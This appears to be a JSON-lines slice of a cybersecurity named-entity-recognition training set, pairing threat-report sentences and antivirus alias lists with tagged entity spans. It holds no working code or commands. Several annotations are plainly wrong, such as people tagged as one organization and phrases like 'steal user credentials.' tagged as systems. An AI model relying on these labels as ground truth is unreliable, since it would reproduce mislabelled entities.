{"text": "A backdoor also known as: Trojan.Inject Trojan.Bublik.Win32.19217 W32/Trojan.NHBC-1750 BKDR_BMDOOR.SMZAEK-A Trojan.Win32.Inject.wavu Trojan.Win32.Androm.dlcdpz Win32.Trojan.Inject.Duwc BKDR_BMDOOR.SMZAEK-A Trojan.Inject.gwc Trojan/Win32.Inject Trojan.Win32.Inject.wavu Trojan.Inject Trojan.Inject!zWOSv6fC2j0 Win32/Trojan.ae0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002817", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Virut.1!O Hacktool.Virledi Win32.Worm.AutoRun.bz W32/Virut.AI PE_VIRUX.A-1 Worm.Win32.WBNA.roc Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.HLLW.Autoruner2.15607 PE_VIRUX.A-1 W32/Virut.AI Win32/Virut.bt Virus/Win32.Virut.ce Worm:Win32/Virledi.A Worm.Win32.WBNA.roc Trojan/Win32.Zbot.C401270 Virus.Virut.06 Worm.AutoRun.FLD Win32.Virut.E Trojan-Downloader.Win32.VB Trj/Dtcontx.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002818", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.ProxyChanger.144352 Trojan.ProxyChanger Trojan/ProxyChanger.to Win32.Trojan.WisdomEyes.16070401.9500.9857 Trojan.Win32.ProxyChanger.mx Trojan.Win32.Z.Proxychanger.144352 Trojan.Proxy.27390 Trojan.ProxyChanger.Win32.985 Trojan.Win32.ProxyChanger W32/Trojan.WVYD-3840 TrojanDownloader.Cabby.ug TR/Crypt.ZPACK.137306 Trojan/Win32.ProxyChanger Trojan.Win32.ProxyChanger.mx Trojan:Win32/Tepoyx.K Trojan/Win32.Cryptolocker.R145008 Trojan.ProxyChanger Win32/ProxyChanger.TO Trojan.ProxyChanger!ZhCr5dI6SeY W32/Kryptik.DEQP!tr Win32/Trojan.0f5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002819", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.GZ.E0D821 Ransom_Blocker.R004C0DK917 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_Blocker.R004C0DK917 Trojan-Ransom.Win32.Blocker.kklp Backdoor.Win32.Zelug.ER BehavesLike.Win32.BadFile.mt TR/Barys.796 Trojan[Downloader]/Win32.Dapato Backdoor:Win32/Zelug.B Trojan-Ransom.Win32.Blocker.kklp TScope.Malware-Cryptor.SB W32/Dapato.A!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002821", "source": "cyner2_train"}}
{"text": "The backdoor has been analyzed previously and is a robust tool associated with this group, likely being used as an early stage reconnaissance tool.", "spans": {"MALWARE: backdoor": [[4, 12]], "MALWARE: tool": [[58, 62]], "THREAT_ACTOR: group,": [[84, 90]], "MALWARE: tool.": [[142, 147]]}, "info": {"id": "cyner2_train_002823", "source": "cyner2_train"}}
{"text": "It has frequently been used to spread cryptocurrency mining malware, perhaps indicating an evolution towards direct monetization.", "spans": {"MALWARE: cryptocurrency mining malware,": [[38, 68]]}, "info": {"id": "cyner2_train_002824", "source": "cyner2_train"}}
{"text": "Due to these two layers, we use the name TwoFace to track this webshell.", "spans": {"MALWARE: TwoFace": [[41, 48]], "MALWARE: webshell.": [[63, 72]]}, "info": {"id": "cyner2_train_002828", "source": "cyner2_train"}}
{"text": "Because of the active investigation, I cannot reveal C&C domains used in the samples.", "spans": {}, "info": {"id": "cyner2_train_002829", "source": "cyner2_train"}}
{"text": "The discovered Javascript code runs hidden in the browser and activates when text is entered on a payment page.", "spans": {"SYSTEM: browser": [[50, 57]]}, "info": {"id": "cyner2_train_002830", "source": "cyner2_train"}}
{"text": "These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank.", "spans": {"ORGANIZATION: Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank.": [[15, 312]]}, "info": {"id": "cyner2_train_002831", "source": "cyner2_train"}}
{"text": "This particular family of information stealers has been around since 2011", "spans": {"THREAT_ACTOR: family of information stealers": [[16, 46]]}, "info": {"id": "cyner2_train_002832", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Sohanad.NGW Ransom/W32.Blocker.3009335 Trojan.Musta Win32.Worm.Sohanad.NGW TROJ_ZAPCHAST.BN Win32/Tnega.SdcSccB TROJ_ZAPCHAST.BN Trojan-Ransom.Win32.Blocker.kock Win32.Worm.Sohanad.NGW Trojan.Win32.Blocker.ewkvvx Troj.Ransom.W32.Blocker!c Win32.Trojan.Blocker.Ahon Win32.Worm.Sohanad.NGW W32/Trojan.VZLV-7504 TR/Autoit.ezxix Trojan:Win32/Musta.A Win32.Worm.Sohanad.NGW Trojan-Ransom.Win32.Blocker.kock Win32.Worm.Sohanad.NGW Trojan/Win32.Zapchast.R109977 Trojan-Ransom.Blocker Win32/Autoit.KE Worm.Win32.AutoIt Trj/CI.A Win32/Worm.f95", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002835", "source": "cyner2_train"}}
{"text": "BankBot is particularly risky because it disguises itself as legitimate banking apps, typically using fake overlay screens to mimic existing banking apps and steal user credentials.", "spans": {"MALWARE: BankBot": [[0, 7]], "SYSTEM: banking apps,": [[72, 85]], "SYSTEM: banking apps": [[141, 153]], "SYSTEM: steal user credentials.": [[158, 181]]}, "info": {"id": "cyner2_train_002837", "source": "cyner2_train"}}
{"text": "The dropper includes a 64 bit version of KONNI;", "spans": {"MALWARE: dropper": [[4, 11]], "SYSTEM: 64 bit version": [[23, 37]], "MALWARE: KONNI;": [[41, 47]]}, "info": {"id": "cyner2_train_002838", "source": "cyner2_train"}}
{"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious… So what ? After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created .", "spans": {"ORGANIZATION: CSIS Group": [[173, 183]], "ORGANIZATION: Wolf Research": [[229, 242]], "ORGANIZATION: LokD": [[283, 287]]}, "info": {"id": "cyner2_train_002839", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.186 W97M/Downloader.c Trojan.OBLD-0 O97M_BOGAVERT.A VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 W97M.DownLoader.110 O97M_BOGAVERT.A W97M/Downloader.c W97M/Dldr.Bogavert.xehvk TrojanDownloader:O97M/Bogavert.A HEUR.VBA.Trojan.e VB:Trojan.Valyria.186 Trojan-Downloader.O97M.Bogavert heur.macro.drop.fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002842", "source": "cyner2_train"}}
{"text": "How did Gooligan emerge ? Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year .", "spans": {"MALWARE: Gooligan": [[8, 16], [60, 68]], "MALWARE: SnapPea": [[95, 102]]}, "info": {"id": "cyner2_train_002843", "source": "cyner2_train"}}
{"text": "Recent variants drop distinctively named malware such as KingKong.dll.", "spans": {"MALWARE: variants": [[7, 15]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_002845", "source": "cyner2_train"}}
{"text": "Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: an espionage actor": [[36, 54]], "ORGANIZATION: organizations": [[65, 78]], "ORGANIZATION: high-value targets": [[83, 101]], "ORGANIZATION: defense": [[105, 112]], "ORGANIZATION: government.": [[117, 128]]}, "info": {"id": "cyner2_train_002846", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Wolfst.A Trojan-Dropper.Win32!O TrojanDropper.Wolfst Trojan/Dropper.Wolfst TROJ_WOLFST.DRP Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Dropper TROJ_WOLFST.DRP Trojan.Dropper.Wolfst.A Trojan-Dropper.Win32.Wolfst Trojan.Dropper.Wolfst.A Trojan.Win32.Wolfst.ejqa Dropper.Wolfst.26146 Trojan.Dropper.Wolfst.A Trojan.Dropper.Wolfst.A Trojan.MulDrop.385 Dropper.Wolfst.Win32.8 BehavesLike.Win32.Dropper.tc W32/Trojan.DTTZ-6513 TrojanDropper.PeStaple.t RiskWare[RemoteAdmin]/Win32.RMS Trojan.Dropper.Wolfst.A W32.W.Bybz.lwoN Trojan-Dropper.Win32.Wolfst Dropper/Win32.Wolfst.R141816 Trojan.Dropper.Wolfst.A TScope.Trojan.Delf Trojan.DR.Wolfst!967kQq5cZ1Q Trojan-Dropper.Win32.Wolfst", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002848", "source": "cyner2_train"}}
{"text": "For more information, see information on the EITest campaign in the Unit 42 blog titled: Decline in Rig Exploit Kit.", "spans": {"THREAT_ACTOR: the EITest campaign": [[41, 60]], "ORGANIZATION: the Unit 42": [[64, 75]], "MALWARE: Rig Exploit Kit.": [[100, 116]]}, "info": {"id": "cyner2_train_002850", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.IlamMak.Trojan Trojan.Win32.Delf!O Trojan.Delf Trojan.Delf.Win32.9224 Win32.Trojan.Delf.ii W32/Trojan.HGGE-3556 Infostealer.Yahmali Win32/Yahmali.C TSPY_YAHMALI.B Trojan.Win32.Delf.aam Trojan.Win32.Delf.dxmnga TSPY_YAHMALI.B Trojan-GameThief.Win32.Nilage W32/Trojan2.OXXZ Trojan/Delf.ia TR/Delf.aam.35 Trojan/Win32.Delf Win32.Virut.ce.57344 PWS:Win32/Yahmali.A Trojan.Win32.A.Delf.104448 Trojan.Win32.Delf.aam Trojan/Win32.Yahmali.R25760 Trojan.Autorun.Havijak.1 Trojan.PasswordStealer W32/FolderToEXE.A.worm Win32/Delf.AAM Trojan.Delf!QRjoRop97so", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002852", "source": "cyner2_train"}}
{"text": "The Elf.BillGates version targets Linux operating system.", "spans": {"SYSTEM: Linux operating system.": [[34, 57]]}, "info": {"id": "cyner2_train_002853", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002854", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9933 Trojan.Win32.Pincav.dxbist Trojan.Win32.Z.Zusy.618496.BJ Trojan.DownLoader22.56304 BehavesLike.Win32.AdwareConvertAd.jh TR/AD.Corebot.mgjun Trojan.Zusy.D27BC8 Trojan:Win32/Corebot.A Trojan.Downloader Win32/Trojan.BO.918", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002855", "source": "cyner2_train"}}
{"text": "Since then, it has evolved fairly rapidly and has added new capabilities, as reported.", "spans": {}, "info": {"id": "cyner2_train_002856", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Inject.Win32.237373 Troj.W32.Inject!c W32/Trojan.JMPH-3101 Trojan.Win32.Inject.aeryd Trojan.Win32.Banbra.elzzqd Trojan.MulDrop7.31178 BehavesLike.Win32.PUPXBY.dh Trojan.Inject.vwf TR/Sfuzuan.jhmvt Trojan.Ursu.D4870 Trojan.Win32.Inject.aeryd Trojan:Win32/Sfuzuan.B!bit Trj/GdSda.A Win32.Trojan.Inject.Wklz Trojan.PWS.Banbra!c5Sww8Szjr0 Trojan.Win32.Sfuzuan", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002860", "source": "cyner2_train"}}
{"text": "Within the time between the discovery of the vulnerability and the release of the fix, a bad actor might try to get the most out of his previously valuable attack assets.", "spans": {"VULNERABILITY: vulnerability": [[45, 58]], "THREAT_ACTOR: bad actor": [[89, 98]]}, "info": {"id": "cyner2_train_002862", "source": "cyner2_train"}}
{"text": "This malware has been reported to have been used in high profile breaches like the ones at Wellpoint/Anthem, VAE Inc, USIS and Mitsubishi Heavy Industries.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: high profile": [[52, 64]], "ORGANIZATION: Wellpoint/Anthem, VAE Inc, USIS": [[91, 122]], "ORGANIZATION: Mitsubishi Heavy Industries.": [[127, 155]]}, "info": {"id": "cyner2_train_002864", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TROJ_DLDR.SMI Win32.Trojan.WisdomEyes.16070401.9500.9976 Trojan.Adclicker TROJ_DLDR.SMI Trojan.Win32.CcKrizCry.dpsxlj Troj.Downloader.W32.Helminthos.kZDa Downloader.KrizCry.Win32.252 BehavesLike.Win32.Backdoor.dm TR/Malushka.umxne Trojan[Downloader]/Win32.CcKrizCry TrojanDownloader:Win32/Malushka.T Trojan/Win32.Cckrizcry.R7632 Win32.Trojan.Dldr.Lscd W32/KrizCry.M!tr.dldr Win32/Trojan.3f8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002865", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.GBYU-0953 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Worm.Win32.Delf.579072 Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 Virus.Win32.Ramnit W32/Worm.APDA Win32/Virut.bt Virus/Win32.Virut.ce W32.Virut.lJ4T Virus.Win32.Virut.ce HEUR/Fakon.mwf Virus.Virut.14 W32/Sality.AO Virus.Win32.Virut.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002866", "source": "cyner2_train"}}
{"text": "The in-depth report provides an analysis of technology, impact, possible attribution – and a signature to detect the malware.", "spans": {"MALWARE: malware.": [[117, 125]]}, "info": {"id": "cyner2_train_002867", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan-Downloader.Win32.VB.aohd Trojan.Win32.VB.ecbrdj Trojan.DownLoad2.47277 BehavesLike.Win32.BadFile.nm TrojanDownloader.VB.dkqk Trojan-Downloader.Win32.VB.aohd TrojanDownloader:Win32/Vbload.J", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002868", "source": "cyner2_train"}}
{"text": "BadRabbit is distributed as a fake flash update, and reportedly using Mimikatz, the Eternal Romance exploit, and a list of passwords to spread via SMB in a worm-like fashion.", "spans": {"MALWARE: BadRabbit": [[0, 9]], "MALWARE: Mimikatz, the Eternal Romance exploit,": [[70, 108]], "SYSTEM: SMB": [[147, 150]]}, "info": {"id": "cyner2_train_002870", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Bitsto BKDR_BISCUIT.A Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/TrojanX.EGVY BKDR_BISCUIT.A Trojan.Win32.Click.dsvjap Trojan.Click.31006 BehavesLike.Win32.RAHack.nc W32/Trojan.RGTL-7538 Backdoor:Win32/Bitsto.A Adware/Win32.NaviPromo.R36681", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002871", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RiskWare.Tool.CK Trojan.Tool!qSvNdOK1TCo Riskware.Win32.ASEye.cjxuqg Virus.Win32.Heur.c Tool.ASEye.2 BehavesLike.Win32.ToolTPatch.lm Unwanted/Win32.Patch Hacktool.Win32.TPE.BA Trojan.Feutel.AV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002873", "source": "cyner2_train"}}
{"text": "We estimate that through the malware s malicious activities, the perpetrators behind it gained over $1.5 million over the course of two months.", "spans": {"MALWARE: malware": [[29, 36]], "THREAT_ACTOR: the perpetrators": [[61, 77]]}, "info": {"id": "cyner2_train_002875", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.FC.6901 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Diztakun.dbjduc Win32.Trojan.Spy.Sudw BehavesLike.Win32.Trojan.dh Trojan.Win32.Diztakun W32/Trojan.IYBN-7194 Trojan.Kazy.D82509 Trojan:MSIL/Diztakun.A!bit Trojan/Win32.Diztakun.C2318558 Trj/GdSda.A Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002876", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/StartPage.axk Trojan.Startpage Win.Trojan.Startpage-757 Trojan.MSIL.StartPage.bo Trojan.Win32.StartPage.eaqxl Trojan.StartPage.22255 Trojan/StartPage.ajy TR/StartPage.axk.2 Trojan:MSIL/Startpage.A Trojan.MSIL.StartPage.bo Trojan/Win32.StartPage.C59843 Trj/CI.A MSIL/StartPage.A Win32.Trojan.Startpage.cduj Trojan.StartPage!8fKymuz2/+o Trojan.Win32.StartPage W32/StartPage.PL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002877", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Morto.dll.b Trojan/Morto.l WORM_MORTO.SM2 Worm.Win32.Morto!IK Worm.Win32.Morto.~dln Worm/Morto.dlnam WORM_MORTO.SM2 W32/Morto.dll.b Worm:Win32/Morto.D Worm/Win32.Morto Worm.Win32.Morto.h Worm.Win32.Morto W32/Morto.A!tr Worm/Morto.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002878", "source": "cyner2_train"}}
{"text": "Adversaries have been seen leveraging JexBoss, an open source tool for testing and exploiting JBoss application servers, to gain a foothold in the network.", "spans": {"MALWARE: JexBoss,": [[38, 46]], "SYSTEM: JBoss application servers,": [[94, 120]]}, "info": {"id": "cyner2_train_002879", "source": "cyner2_train"}}
{"text": "In this case, Proofpoint researchers discovered an infected Android version of the newly released mobile game Pokemon GO", "spans": {"ORGANIZATION: Proofpoint researchers": [[14, 36]], "SYSTEM: Android version": [[60, 75]], "SYSTEM: mobile game Pokemon GO": [[98, 120]]}, "info": {"id": "cyner2_train_002881", "source": "cyner2_train"}}
{"text": "Upon loading the rtf document, it will drop a base64 encoded powershellscript in the following location:%TEMP%\\log.ps1", "spans": {}, "info": {"id": "cyner2_train_002882", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Detrahere Trojan.Midie.DA596 TROJ_KRYPTIK_HA22006D.UVPM Trojan.Win32.DownLoad3.exdqqe Trojan.DownLoad3.64586 Trojan.Kryptik.Win32.1347406 TROJ_KRYPTIK_HA22006D.UVPM Trojan.MSIL.ikyj TR/Crypt.ZPACK.hgndb Trojan:Win32/Detrahere.E Trojan/Win32.Tiggre.R216587 Trojan.Crypt Win32/Trojan.daa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002883", "source": "cyner2_train"}}
{"text": "Now more threat actors are leveraging the vulnerability in Microsoft Server Message Block SMB protocol – this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.", "spans": {"THREAT_ACTOR: threat actors": [[9, 22]], "VULNERABILITY: vulnerability": [[42, 55]], "SYSTEM: Microsoft Server Message Block SMB protocol": [[59, 102]], "MALWARE: Trojan Gh0st RAT.": [[148, 165]]}, "info": {"id": "cyner2_train_002884", "source": "cyner2_train"}}
{"text": "Specifically, the format resembles custom virtual machine code, where numeric hexadecimal identifiers present in the configuration file make the stealer run desired functions.", "spans": {"SYSTEM: virtual machine": [[42, 57]], "MALWARE: stealer run": [[145, 156]]}, "info": {"id": "cyner2_train_002886", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Stration.DDA@mm Win32.Stration.DDA@mm I-Worm.Warezov.r3 Win32.Stration.DDA@mm Trojan.Win32.Warezov.ehypz W32/Worm.ARBW W32.Stration@mm Win32.Stration.DDA@mm I-Worm.Opnis!V3KJQVovhbU I-Worm.Win32.Warezov.20480.AW[h] Win32.Worm-email.Warezov.Lpvc Win32.Stration.DDA@mm Worm.Win32.Warezov.~AD Win32.Stration.DDA@mm Win32.HLLM.Limar.3939 Worm.Warezov.Win32.123 W32/Worm.IQCC-3677 I-Worm.Warezov.bu WORM/Warezov.2048.1 W32/Stration.KG!tr Worm[Email]/Win32.Warezov Win32.Stration.E878FD Worm:Win32/Stration.ST Win32/Stration.AHP Worm.Win32.Warezov.aK Worm.Win32.Warezov Win32.Stration.DDA@mm Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002887", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.E38E91 Win32.Trojan.WisdomEyes.16070401.9500.9982 WORM_AMBLER.SMZ Trojan-Spy.Win32.Amber.zdc Trojan.Win32.Amber.etbxtl Win32.Trojan-spy.Amber.Wskc Trojan-Spy.Win32.Ambler WORM_AMBLER.SMZ BehavesLike.Win32.Virut.qc Trojan-Dropper.Win32.Ambler W32/Trojan.MMWY-8251 TrojanSpy:Win32/Ambler.D Trojan-Spy.Win32.Ambler Win32/AutoRun.Spy.Ambler.NAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002890", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Keylogger.Win32.19936 Trojan/Spy.nut Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.DownLoader6.20458 Trojan/Win32.Graftor.R31665 TrojanSpy.KeyLogger!VshB9boiuX0 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002892", "source": "cyner2_train"}}
{"text": "With that inclusion, companies running on those systems will also be at risk.", "spans": {}, "info": {"id": "cyner2_train_002894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: RemoteAdmin.Win32.RAT!O Backdoor.Daromec Backdoor.Breut not-a-virus:RemoteAdmin.Win32.RAT.a Trojan.Win32.MLW.dbyfty BackDoor.Comet.21 Trojan[RemoteAdmin]/Win32.RAT not-a-virus:RemoteAdmin.Win32.RAT.a Backdoor:Win32/Daromec.A RiskWare.RemoteAdmin Trojan.MiniUPnP!L9xsRhGGfN0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002896", "source": "cyner2_train"}}
{"text": "That domain still hosts the malicious Flash file CVE-2015-7645 that it previously used in standalone attacks.", "spans": {"MALWARE: malicious": [[28, 37]], "SYSTEM: Flash": [[38, 43]]}, "info": {"id": "cyner2_train_002898", "source": "cyner2_train"}}
{"text": "On August 4, 2016, the Gmail account of an unknown individual was compromised in order to conduct spearphishing campaigns against a diverse set of targets related to Iran.", "spans": {"SYSTEM: Gmail account": [[23, 36]], "ORGANIZATION: unknown individual": [[43, 61]], "THREAT_ACTOR: spearphishing campaigns": [[98, 121]]}, "info": {"id": "cyner2_train_002899", "source": "cyner2_train"}}
{"text": "The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.", "spans": {"ORGANIZATION: trend": [[24, 29]], "THREAT_ACTOR: threat groups": [[36, 49]]}, "info": {"id": "cyner2_train_002900", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Program.Hadsruda Trojan.Razy.D2C7F5 Win32.Trojan-Downloader.Adload.aa Win.Malware.Zusy-5689722-0 Riskware.Win32.AdLoad.epwtbh Adware.Oxypumper.159236 Application.Win32.OxyPumper.ADA Trojan.DownLoader26.15650 Adware.OxyPumper.Win32.616 BehavesLike.Win32.Trojan.cc W32/Trojan.TQZU-9354 Adware.Adload.cqi ADWARE/OxyPumper.vgssx GrayWare[AdWare]/Win32.AdLoad Adware.OxyPumper/Variant Trojan.Downloader Trj/GdSda.A Win32.Trojan.Razy.Lmkk PUA.AdLoad! PUA.OxyPumper Win32/Trojan.4e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002901", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.A5 Win32.Trojan.WisdomEyes.16070401.9500.9603 not-a-virus:NetTool.Win64.RPCHook.a BehavesLike.Win32.Downloader.vc TrojanDownloader.Paph.ds Trojan[Downloader]/Win32.Betload Trojan.Jaike.DD8D Troj.W32.Inject.tnKf not-a-virus:NetTool.Win64.RPCHook.a Trojan-Downloader.Win32.Moure Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002902", "source": "cyner2_train"}}
{"text": "We previously reported on SamSam ransomware charging high ransoms for infected servers.", "spans": {"MALWARE: SamSam ransomware": [[26, 43]], "SYSTEM: infected servers.": [[70, 87]]}, "info": {"id": "cyner2_train_002903", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.S_Gamma.Trojan Trojan/W32.Obfuscated.770368 Trojan.Win32.Obfuscated!O Trojan.VBCrypt.MF.137 WORM_IRCBOT.BXN Win32.Worm.VB.rx W32/VB.Worm.A W32.Mibling Win32/Malinbot.A WORM_IRCBOT.BXN Trojan.Win32.Obfuscated.aiiz Trojan.Win32.Obfuscated.700736 Troj.W32.Obfuscated.l2p6 Trojan.Click.43851 BehavesLike.Win32.Ramnit.bc W32/VB.Worm.A Worm:Win32/Lamin.A Worm:Win32/Lamin.A Trojan.Win32.Obfuscated.aiiz Trojan.Obfuscator Trj/Dropper.AJT Win32/VB.NRJ Trojan.Obfuscated.AHVV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002905", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/PSW.Katalog Trojan-PWS/W32.Katalog.61440 Trojan/PSW.Katalog Trojan.PWS.Katalog!pK2Uo9nMTKQ TROJ_KATALOG.A Trojan-PSW.Win32.Katalog Trojan.Win32.Katalog-Psw.fjsg Trojan.Win32.A.PSW-Katalog.61440[h] TrojWare.Win32.PSW.Katalog TROJ_KATALOG.A W32/Trojan.XHBZ-0001 Trojan/PSW.Katalog TR/Katalog.PSW W32/Katalog.A!tr.pws Trojan[PSW]/Win32.Katalog Win32.Troj.pswKatalog.kcloud Downloader/Win32.VB TrojanPSW.Katalog Trj/PSW.Katalog Trojan.Win32.InfoStealer.Ahg Win32/Trojan.PSW.b74", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002906", "source": "cyner2_train"}}
{"text": "The Dark Power ransomware gang is new on the block, and is trying to make a name for itself.", "spans": {"THREAT_ACTOR: The Dark Power ransomware gang": [[0, 30]]}, "info": {"id": "cyner2_train_002907", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Dropper.Grizl.kp W32/Dropper.ANGS Infostealer.Gampass TSPY_ONLINEG.SMA Trojan-GameThief.Win32.Lmir!IK TrojWare.Win32.PSW.OnLineGames.NYT0 Trojan.PWS.Gamania.22629 TSPY_ONLINEG.SMA TrojanDropper:Win32/Lolyda.F W32/Dropper.ANGS Trojan/Win32.Lmir TrojanPSW.Lmir.jfz Win32/PSW.OnLineGames.NYT Trojan.PSW.Win32.GameOnline.gcv Trojan-GameThief.Win32.Lmir W32/Grizl.GA!tr.dldr PSW.OnlineGames3.WPS Trj/Krap.Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002912", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.BHE Ransom.Petya.S19638 Trojan.Ransom.BHE W32/GoldenEye.SONR-5498 Ransom.Goldeneye Ransom_PETYA.SM1 Trojan.Ransom.BHE Trojan.Win32.MBRlock.epgnaf Trojan.Ransom.BHE Trojan.MBRlock.265 Trojan-Ransom.GoldenEye W32/GoldenEye.D Trojan.DiskWriter.bp W32/Petya.D!tr.ransom Trojan.Ransom.BHE Trojan/Win32.Petr.C1697437 Trojan.Ransom.BHE Ransom.Petya Trojan.Petya Hoax.Petr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002914", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.AB21 Trojan-Downloader.Win32.Firu!O Troj.Downloader.W32!c Trojan/Downloader.Firu.bp Win32.Trojan.WisdomEyes.16070401.9500.9958 Trojan-Downloader.Win32.Firu.bp Trojan.Packed.418 BehavesLike.Win32.Dropper.mc Trojan-Downloader.Win32.Firu.bp W32/Trojan.BNRM-7642 TrojanDownloader.Firu.t Trojan:Win32/Bohmini.A Trojan-Downloader.Win32.Firu.bp Trojan/Win32.Xema.C57004 TrojanDownloader.Firu Trj/Downloader.VMH Win32.Trojan-downloader.Firu.Tcmb Win32/Trojan.Downloader.d1e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002915", "source": "cyner2_train"}}
{"text": "Recently, we spotted a new attack where PowerShell was abused to deliver a FAREIT variant.", "spans": {"SYSTEM: PowerShell": [[40, 50]], "VULNERABILITY: abused": [[55, 61]], "MALWARE: FAREIT variant.": [[75, 90]]}, "info": {"id": "cyner2_train_002916", "source": "cyner2_train"}}
{"text": "The newly discovered samples show new capabilities not previously documented.", "spans": {}, "info": {"id": "cyner2_train_002918", "source": "cyner2_train"}}
